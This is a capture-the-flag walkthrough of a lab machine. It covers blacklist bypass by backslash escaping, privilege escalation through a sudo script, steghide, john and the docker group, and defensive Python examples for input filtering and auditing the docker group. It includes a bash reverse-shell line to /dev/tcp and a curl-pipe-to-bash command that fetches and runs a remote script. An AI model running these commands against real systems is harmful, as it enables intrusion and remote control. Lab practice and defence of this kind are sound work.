# ChillHack

![](/files/-MbgrjbBAYZC9550rdXe)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```
nmap -Pn 10.10.161.202
```

![](/files/-Mbgsi7fqW0fSqvwR6Gr)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version detection
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 21, 22 and 80
* (**-oN nmap**): Saving the output into a file called `nmap`

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.161.202
```

![](/files/-Mbgsu3ZMttkFXYT1YtP)

## Enumeration

### Port 21: FTP

We see in the nmap scan that anonymous FTP login is allowed, so let's log in.

```
ftp 10.10.161.202
```

![](/files/-MbgtEZlmQanVtn1715_)

Listing the files, we see a `note.txt` file, so let's transfer it to our machine.

```
get note.txt
```

![](/files/-Mbgtd83fm5rnfUNQD1r)

Let's read `note.txt`.

![](/files/-Mbgts6o7C-2IFOlkY8y)

We have two usernames, `Anurodh` and `Apaar`; let's add them to our notes.

![](/files/-MbguVT6gkK09yU0nOKc)

The note also mentions that some strings passed to the command are filtered, which we may run into while enumerating this machine further.

### Port 80: HTTP

Let's visit the site.

![](/files/-Mbgv0GPOgZyIpzVMVHL)

It looks like a well-made website. Let's run gobuster to find hidden directories while we explore the webpage.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.161.202 
```

I looked through the website and found nothing interesting in the source code either; after a while I got the results of the gobuster scan.

![](/files/-MbgwAIdVoNj6YOyIbdo)

Let's visit this `/secret` directory.

![](/files/-MbgwMGb2ET0S-yNVbL2)

It looks like we can execute commands, so let's try a basic one. When I tried executing `ls`, it gave me this.

![](/files/-MbgwWYh3WLEeUjn-oJB)

Looking back at `note.txt`, it mentioned that the commands are filtered. I remembered that one way to get past a word filter is to put backslashes inside the command: since we are not escaping any special characters, bash interprets the word exactly as if the backslash were not there, while a naive string match on the filter's side no longer sees the blacklisted word. Let's try `l\s`.

![](/files/-Mbgx76CTDK4aFcfEOLl)

It worked, so now let's check the `index.php` page, which will tell us what characters and words are being filtered.

```
c\at index.php
```

After executing the command, look at the source code.

![](/files/-MbgyQyqsSI6hwUKghzg)

We have a list of blacklisted words, which means we cannot use them directly in the command, and we can also see the function that allows command injection. Let's now try to get a reverse shell on the machine.
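To make clear why the word filter in `index.php` was so easy to get around, here is an added example (not code from the writeup or from the room) that puts a naive substring blacklist next to two stronger checks. The blacklist contents are a constructed assumption, not the real list from the box; the point is that a filter that matches the raw string never sees `ls` in `l\s`, whereas a filter that first decodes the input the way the shell would, or better, one that only permits a fixed allow-list of single words, does.

```python
import shlex
from typing import List, Optional

# Constructed blacklist, modelled on the kind of word filter the writeup
# describes; the real list on the box lives in index.php and is not reproduced here.
BLACKLIST = {"ls", "cat", "bash", "python"}

# Characters that let one "command" turn into several; rejected by the allow-list check.
SHELL_META = set("|&;$`<>()\\") | {'"', "'"}


def naive_blacklist_blocks(cmd: str) -> bool:
    """Substring match on the raw input, the style of check that l\\s slips past."""
    return any(word in cmd for word in BLACKLIST)


def normalized_tokens(cmd: str) -> Optional[List[str]]:
    """Split the input the way a POSIX shell would.

    shlex.split(posix=True) removes backslash escapes and quotes, so the
    tokens are the words the shell would actually execute:
    'l\\s' -> ['ls'], 'c\\at index.php' -> ['cat', 'index.php'].
    Returns None for input the shell itself would reject (unterminated quote).
    """
    try:
        return shlex.split(cmd, posix=True)
    except ValueError:
        return None


def normalized_blacklist_blocks(cmd: str) -> bool:
    """Blacklist applied to the decoded words instead of the raw string."""
    tokens = normalized_tokens(cmd)
    if tokens is None:
        return True  # unparsable input: reject rather than guess
    return any(tok in BLACKLIST for tok in tokens)


def allowlist_permits(cmd: str, allowed) -> bool:
    """The safer design: only a fixed set of single-word commands may run.

    Anything with shell metacharacters, arguments, pipes, or a command that is
    not on the allow-list is rejected; the filter never has to enumerate bad words.
    """
    if any(ch in SHELL_META for ch in cmd):
        return False
    tokens = normalized_tokens(cmd)
    if not tokens or len(tokens) != 1:
        return False
    return tokens[0] in allowed


if __name__ == "__main__":
    # Constructed sample inputs, including the backslash trick from the writeup.
    samples = ["ls", "l\\s", "c\\at index.php", "uptime", "uptime; id"]
    for s in samples:
        print(f"{s!r:20} naive_blocks={naive_blacklist_blocks(s)!s:5} "
              f"normalized_blocks={normalized_blacklist_blocks(s)!s:5} "
              f"allowlisted={allowlist_permits(s, {'uptime', 'date'})}")
```

Even the normalized check is only a stopgap: it does not model variable expansion, `$IFS` tricks or brace expansion, so the real fix for a page like this is to never hand user input to a shell and to use an allow-list of fixed operations instead.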

## Exploitation

* First we create a bash reverse shell.
* Second we transfer it to the victim machine by starting an HTTP server on our machine and using the curl command.
* Finally, once the file is downloaded, we start a netcat listener and execute the transferred file to get a reverse shell on the machine.

First we create a bash reverse shell called `shell.sh` containing:

```
bash -c "bash -i >& /dev/tcp/<your-ip>/1234 0>&1"
```

Now we start an HTTP server:

```
python3 -m http.server 8000
```

![](/files/-Mbh-tkwPh5xyUhJpTd5)

Let's also start a netcat listener.

```
nc -lvnp 1234
```

![](/files/-Mbh0PHn8pJs-UP4TqVn)

Now we download the file on the victim machine using curl and execute it with bash in the same command. We put a backslash in `bash` because that word has been blacklisted.

```
curl <your-ip>:8000/shell.sh | ba\sh
```

After executing the command, we get a reverse shell.

![](/files/-Mbh1E2DT9mUVBa18v5F)

Let's now stabilize the shell.

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl + Z to background the shell
stty raw -echo; fg
reset
# press Ctrl + C when prompted
```

![](/files/-Mbh2BO329jWVxKDc5rN)

## Privilege Escalation

Looking at the files on the system, we did not have permission to read most of them, so let's run an automatic enumeration script called `linpeas`. You can find it on Google; once you have downloaded it, we have to transfer it to this machine.

![](/files/-Mbh7OCFUb-cA6ovegF0)

We already have an HTTP server running; if you switched it off, start it up again.

![](/files/-Mbh4RJ_E4eJhbInRSWn)

Now we have to go to the `/tmp` directory, as we are not allowed to write files in other directories and `/tmp` usually lets us write files into it.

```bash
wget http://<your-ip>:8000/linpeas.sh
```

![](/files/-Mbh7XTstnupFcXu3iBJ)

Before running it, let's run `sudo -l` to see what we can run as other users.

![](/files/-Mbh8EZUUXFp4Lxkek2G)

It looks like we can run a script file; let's read it.

![](/files/-Mbh8QNWqFMHY_tXquvU)

Looking at the script, it appears to be vulnerable to command injection, as there are no filters. Since this file is owned by Apaar and we can run it as that user, we can try running it and executing a bash shell to get a shell as the user Apaar.

Let's first run the file, then type `/bin/bash` to get a shell as Apaar, and then stabilize the shell.

```bash
sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

![](/files/-MbhAgAXnSQJy2GzkKnJ)

We are now the user Apaar and can read the user flag in Apaar's home directory.

![](/files/-MbhAydgg2VRjLn-JVeL)

Now I tried running linpeas but it did not work, so I had to find another way to escalate privileges, and that is when I found some interesting files in `/var/www/files`.

![](/files/-MbhCRxjYPXIovXxSYMT)

Let's read these files.

#### `hacker.php`

![](/files/-MbhCUcdLXG-M9qxUWIL)

This looks like it displays an image file, and there is a message hinting that there might be something hidden in the image. Let's download this file, but before that, let's explore the other files.

#### `account.php`

![](/files/-MbhCpW5kqHno8OFbDLt)

This looks like a login page.

#### `index.php`

![](/files/-MbhCyFtrKrQu57dX4AV)

In this file we see the credentials for the SQL database running on this machine.

Let's now download the image file we found in `hacker.php`. First, let's go to the directory in which the file is present.

![](/files/-MbhE1NLleUHxvaDNRe2)

Let's start an HTTP server on this machine.

```bash
python3 -m http.server 8000
```

![](/files/-MbhEPk4_18xV6Id7at-)

Now let's download the file onto our machine.

```bash
wget http://10.10.161.202:8000/hacker-with-laptop_23-2147985341.jpg
```

![](/files/-MbhEk_v_GGisG9mHBTW)

Now let's look at the file.

![](/files/-MbhFJv-6EDvqBReGYad)

Let's use steghide to look for hidden information in the file (press Enter when asked for the passphrase).

```bash
steghide info hacker-with-laptop_23-2147985341.jpg
```

![](/files/-MbhFd-_9akS_JEyrJkM)

We see a zip file; let's extract it using `steghide`.

```bash
steghide --extract -sf hacker-with-laptop_23-2147985341.jpg
```

![](/files/-MbhFvg4jECUkyHH99ct)

Let's unzip the zip file we got.

```bash
unzip backup.zip
```

![](/files/-MbhH1vh1ksBqdq3aUnP)

It looks like we need a password. We can use `zip2john` and then John the Ripper to find it.

```bash
zip2john backup.zip > hash
```

![](/files/-MbhHV7IKBtaXt9szLxW)

Now use john to crack the password:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

![](/files/-MbhHpb0WvY066WxxvFD)

Now show the password:

```bash
john hash --show
```

![](/files/-MbhHvKHpP80b-wwFgou)

We have the password. Let's unzip the zip file.

```bash
unzip backup.zip
```

![](/files/-MbhI6w_IBq6q7rNR0ul)

Let's read the `source_code.php` file.

![](/files/-MbhID92izi5LJXlHamD)

Looking through it, we find a base64 string that is the password for the user `Anurodh`. Let's decode it.

```bash
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
```

![](/files/-MbhIgmBlYnPZ8vaOc9x)

We have the password; let's now log in through SSH.

```bash
ssh anurodh@10.10.161.202
```

![](/files/-MbhJ0SmFo7lK9bDMVFj)

We are now logged in. I was looking around and did not see anything of interest until I ran the command `id`.

```bash
id
```

![](/files/-MbhJGi-HIq46ah4ImZW)

Anurodh is part of the docker group. We can find the command to become root on [GTFOBins](https://gtfobins.github.io/gtfobins/docker/#shell).

![](/files/-MbhJnDKkhTrO7vBqS7Q)

Let's run this command:

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```

![](/files/-MbhJz1uVVRfjjYHan-b)

We are now root.
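The last step works because membership of the `docker` group is root-equivalent: the daemon runs as root and will happily mount `/` into a container for any member, exactly as the GTFOBins command does. From the defender's side the useful check is simply "who is in that group?". The following audit script is an added example (not part of the writeup or the room); the `/etc/group` and `/etc/passwd` contents it parses are constructed samples, and the tuple of root-equivalent groups is an assumption to extend for your own environment.

```python
from typing import Dict, Set, Tuple

# Groups whose members can trivially obtain root. docker is the case from the
# writeup; treat this tuple as an assumption and extend it for your environment.
ROOT_EQUIVALENT_GROUPS = ("docker",)

# Constructed sample files (not taken from the box).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
docker:x:999:anurodh
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
apaar:x:1000:1000::/home/apaar:/bin/bash
anurodh:x:1001:1001::/home/anurodh:/bin/bash
ci:x:1002:999::/home/ci:/bin/sh
"""


def parse_group_file(text: str) -> Dict[str, Tuple[int, Set[str]]]:
    """Parse /etc/group lines (name:x:gid:member,member) -> {name: (gid, members)}."""
    groups = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 4 or not parts[2].isdigit():
            continue  # malformed line; skip rather than crash the audit
        name, _pw, gid, members = parts
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_passwd_file(text: str) -> Dict[str, int]:
    """Parse /etc/passwd lines -> {user: primary_gid}."""
    users = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7 or not parts[3].isdigit():
            continue
        users[parts[0]] = int(parts[3])
    return users


def root_equivalent_members(group_text: str, passwd_text: str,
                            groups=ROOT_EQUIVALENT_GROUPS) -> Dict[str, Set[str]]:
    """Return {group: users} for each root-equivalent group that has members.

    Counts both supplementary membership (the member list in /etc/group) and
    users whose *primary* group in /etc/passwd is that group, which `id`-style
    checks that only look at the /etc/group member list would miss.
    """
    grp = parse_group_file(group_text)
    pwd = parse_passwd_file(passwd_text)
    findings = {}
    for g in groups:
        if g not in grp:
            continue
        gid, members = grp[g]
        members = set(members) | {u for u, pgid in pwd.items() if pgid == gid}
        if members:
            findings[g] = members
    return findings


if __name__ == "__main__":
    import os
    if os.path.exists("/etc/group") and os.path.exists("/etc/passwd"):
        with open("/etc/group") as g, open("/etc/passwd") as p:
            found = root_equivalent_members(g.read(), p.read())
    else:
        found = root_equivalent_members(SAMPLE_GROUP, SAMPLE_PASSWD)
    for group, users in found.items():
        print(f"[!] group '{group}' is root-equivalent; members: {sorted(users)}")
```

Run as-is it audits the live host, and falls back to the constructed sample otherwise. Anyone it lists should be treated as a root account: either remove them from the group or switch them to rootless Docker.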

